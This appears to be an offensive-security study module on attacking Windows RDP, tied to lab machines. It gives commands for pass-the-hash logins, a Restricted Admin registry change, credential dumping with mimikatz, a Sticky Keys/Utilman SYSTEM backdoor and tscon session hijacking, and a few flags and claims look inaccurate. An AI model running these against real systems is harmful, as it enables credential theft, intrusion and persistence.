Back to All Modules

RDP Exploitation

#Overview

Remote Desktop Protocol (RDP) on port 3389 provides graphical remote access to Windows systems. Exploitation ranges from simple authenticated access with stolen credentials to pass-the-hash via Restricted Admin mode, NLA bypass attacks, and persistence through accessibility feature backdoors. RDP sessions can also be hijacked from active users.

#Prerequisites

  • xfreerdp, rdesktop, or Remmina (Linux) / mstsc.exe (Windows)
  • Valid credentials or NTLM hash (for Restricted Admin mode)
  • Network-level Authentication (NLA) must be disabled for certain attacks

#Detection & Enumeration

nmap -p 3389 --script rdp-ntlm-info <IP>                # RDP version and NLA status
nmap -p 3389 --script rdp-vuln-ms12-020 <IP>            # Check for MS12-020 (BlueKeep precursor)
netexec rdp <IP> -u <user> -p <pass>                    # Test RDP credentials
BASH

#Exploitation / Execution

#Standard RDP Connection

xfreerdp /v:<IP> /u:<user> /p:'<password>'              # Basic connection
xfreerdp /v:<IP> /u:<user> /p:'<password>' /dynamic-resolution  # Auto-resize
xfreerdp /v:<IP> /u:<user> /p:'<password>' /drive:share,/tmp   # Mount local /tmp as share drive
BASH

#NLA Bypass (When NLA is Disabled)

When NLA is disabled, the login screen is rendered before credentials are verified:

xfreerdp /v:<IP> /u:<user> /p:'<password>' /sec:nla:off  # Force NLA off
BASH

#Restricted Admin Mode (Pass-the-Hash over RDP)

Requires the target to have Restricted Admin mode enabled (default on Server 2012 R2+). The NTLM hash is used directly without sending the plaintext password:

xfreerdp /v:<IP> /u:<user> /pth:<NTLM_hash>              # PTH over RDP
xfreerdp /v:<IP> /u:administrator /pth:d9485863c1e9e05851aa40cbb4ab9dff
BASH

Enable Restricted Admin (requires elevated registry access first):

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
POWERSHELL

#RDP Saved Credentials Theft

If SYSTEM access is obtained, saved RDP credentials can be extracted:

cmdkey /list                                              # List saved credentials
# Extract from registry or mimikatz
mimikatz # sekurlsa::dpapi
mimikatz # vault::cred /patch
POWERSHELL

#Sticky Keys / Utilman.exe Backdoor (SYSTEM required)

Replace accessibility features with cmd.exe to spawn SYSTEM shell at login screen:

# Sticky Keys (press Shift 5 times at login screen)
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe /y
# OR Utilman (click Ease of Access at login screen)
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /y
POWERSHELL

Then connect via RDP and trigger the backdoor at the login screen.

#Session Hijacking with TSCon

query session                          # List active sessions
tscon <SESSION_ID> /dest:console       # Hijack session (requires SYSTEM)
POWERSHELL

#Common Pitfalls

  • Warning: NLA enabled blocks the login screen from rendering before auth, making some visual exploitation techniques impossible
  • Warning: Restricted Admin mode requires the hash of a user in the local Administrators group or with explicit RDP permissions

#OPSEC Considerations

  • Shield: RDP logons generate Event ID 4624 with Logon Type 10
  • Shield: Sticky keys/Utilman replacement leaves file hash mismatches and is a well-known attacker technique
  • Shield: Multiple failed RDP attempts trigger account lockout policies

#Post-Exploitation Value

  • Full graphical desktop access for reconnaissance and tool usage
  • Drive redirection allows data exfiltration without network transfer
  • Session persistence: saved RDP credentials survive reboots

#Cross-References

#Tool References

ToolLink
xfreerdphttps://github.com/FreeRDP/FreeRDP
Remminahttps://remmina.org/

#Source Machines

  • Jeeves (Medium, Windows) - RDP for interactive access
  • Administrator (Medium, Windows) - RDP with found credentials